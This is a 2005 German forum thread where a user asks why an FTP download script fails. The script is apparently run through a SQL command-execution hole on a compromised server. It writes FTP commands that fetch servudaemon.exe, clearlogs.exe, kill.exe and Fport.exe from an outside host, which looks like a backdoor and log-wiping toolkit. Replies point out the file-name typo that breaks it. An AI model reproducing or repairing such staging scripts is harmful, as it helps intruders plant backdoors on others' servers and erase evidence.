sqlexec fehler plz help

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von n00b123, 6. August 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 6. August 2005
    hi,
    ich wenn ich versuche das get script (ftp -n -v -s:c:\scr.txt) zu benutzen komm dieser fehler:

    Code:
    Error opening script file c:\ftpscr.txt.
    
    Transfers files to and from a computer running an FTP server service
    
    (sometimes called a daemon). Ftp can be used interactively.
    
    FTP [-v] [-d] [-i] [-n] [-g] [-s:filename] [-a] [-w:windowsize] [-A] [host]
    
    
    
     -v Suppresses display of remote server responses.
    
     -n Suppresses auto-login upon initial connection.
    
     -i Turns off interactive prompting during multiple file
    
     transfers.
    
     -d Enables debugging.
    
     -g Disables filename globbing (see GLOB command).
    
     -s:filename Specifies a text file containing FTP commands; the
    
     commands will automatically run after FTP starts.
    
     -a Use any local interface when binding data connection.
    
     -A login as anonymous.
    
     -w:buffersize Overrides the default transfer buffer size of 4096.
    
     host Specifies the host name or IP address of the remote
    
     host to connect to.
    
    Notes:
    
     - mget and mput commands take y/n/q for yes/no/quit.
    
     - Use Control-C to abort commands.
    liegt das an meinem script oder dem server?

    script:
    Code:
    echo open ftp.mitglied.lycos.de >>c:\scr.txt
    echo xxxxx >>c:\scr.txt
    echo xxxxx >>c:\scr.txt
    echo BINARY>>c:\scr.txt
    echo get servudaemon.exe>>c:\scr.txt
    echo get servudaemon.ini>>c:\scr.txt
    echo get clearlogs.exe>>c:\ftpscr.txt
    echo get kill.exe>>c:\ftpscr.txt
    echo get Fport.exe>>c:\ftpscr.txt
    echo quit>>c:\scr.txt
    
    danke für eure hilfe
    noob
     
  2. 6. August 2005
    lol schau da nochmal ganz genau hin! tipp: name von txt datei
     
  3. 7. August 2005
    Lol, das nenn ich echt mal dämlich...
     
  4. 7. August 2005
    ja da hat ich mich verschrieben
    ma schaun ob es geht
     
  5. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.